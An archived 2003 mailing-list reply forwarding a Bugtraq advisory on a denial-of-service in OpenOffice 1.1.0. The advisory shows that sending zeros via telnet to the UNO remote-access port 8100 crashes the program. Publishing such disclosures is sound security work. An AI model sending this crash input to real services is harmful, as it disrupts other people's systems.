Re: [Nolug] [bugtraq] Openoffice 1.1.0 DoS

From: Ron Johnson <ron.l.johnson_at_cox.net>
Date: Fri, 10 Oct 2003 02:16:33 -0500
Message-Id: <1065770192.1233.138.camel@haggis>

On Thu, 2003-10-09 at 19:39, Mark A. Hershberger wrote:
> More vulnerable Open Source Software.

The fact that it is "Severity : Low" tells us a lot. After all,
StarOffice will still work in "regular" mode.
>
> ______________________________________________________________________
> From: Marc Schoenefeld <schonef@uni-muenster.de>
> Subject: Openoffice 1.1.0 DoS
> Date: Wed, 08 Oct 2003 13:15:10 +0200
>
> ================================
> Illegalaccess.org Security Alert
> ================================
>
> Date : 08/10/2003
> Application : Openoffice
> Version : 1.1.0
> Website : http://www.Openoffice.org
> Problems : Desktop Denial-Of-Service
> Severity : Low
> Contributor : Marc Schoenefeld, marc@org.illegalaccess
>
> When enabling remote access (UNO) to OpenOffice,
> it opens a port (default 8100). This is done typically with
> the following command:
>
> C:\Programme\oo1.1.0\program> soffice
> "-accept=socket,host=<ip>,port=8100;urp;"
>
> where <ip> states the listening address
>
> When issuing the commands listed below, Openoffice crashes and
> prompts the error reporting box.
>
> ===================================================================
> C:\Dokumente und Einstellungen\User>telnet 127.0.0.1 8100
> Trying 127.0.0.1...
> Connected to 127.0.0.1.
> Escape character is '^]'.
> 0
> 0
> 0
> 0
> 0
> 0
> 0
> 0
> 0
> 0
> 0
> 0
> ===================================================================

________________________________________________________________________

-- 
-----------------------------------------------------------------
Ron Johnson, Jr. ron.l.johnson@cox.net
Jefferson, LA USA
Note to LSU and Valdosta State students: India is not an Arab
country!
http://www.talonnews.com/news/2003/october/1009_college_dems_jind
al.shtml
___________________
Nolug mailing list
nolug@nolug.org
Received on 10/10/03

This archive was generated by hypermail 2.2.0 : 12/19/08 EST